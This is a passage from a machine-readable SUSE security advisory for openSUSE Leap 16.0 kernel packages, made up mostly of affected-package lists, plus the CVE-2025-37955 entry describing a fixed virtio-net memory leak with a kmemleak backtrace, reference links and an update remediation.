"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-37904"
},
{
"cve": "CVE-2025-37955",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-37955"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvirtio-net: free xsk_buffs on error in virtnet_xsk_pool_enable()\n\nThe selftests added to our CI by Bui Quang Minh recently reveals\nthat there is a mem leak on the error path of virtnet_xsk_pool_enable():\n\nunreferenced object 0xffff88800a68a000 (size 2048):\n comm \"xdp_helper\", pid 318, jiffies 4294692778\n hex dump (first 32 bytes):\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................\n backtrace (crc 0):\n __kvmalloc_node_noprof+0x402/0x570\n virtnet_xsk_pool_enable+0x293/0x6a0 (drivers/net/virtio_net.c:5882)\n xp_assign_dev+0x369/0x670 (net/xdp/xsk_buff_pool.c:226)\n xsk_bind+0x6a5/0x1ae0\n __sys_bind+0x15e/0x230\n __x64_sys_bind+0x72/0xb0\n do_syscall_64+0xc1/0x1d0\n entry_SYSCALL_64_after_hwframe+0x77/0x7f",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-37955",
"url": "https://www.suse.com/security/cve/CVE-2025-37955"
},
{
"category": "external",
"summary": "SUSE Bug 1243507 for CVE-2025-37955",
"url": "https://bugzilla.suse.com/1243507"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
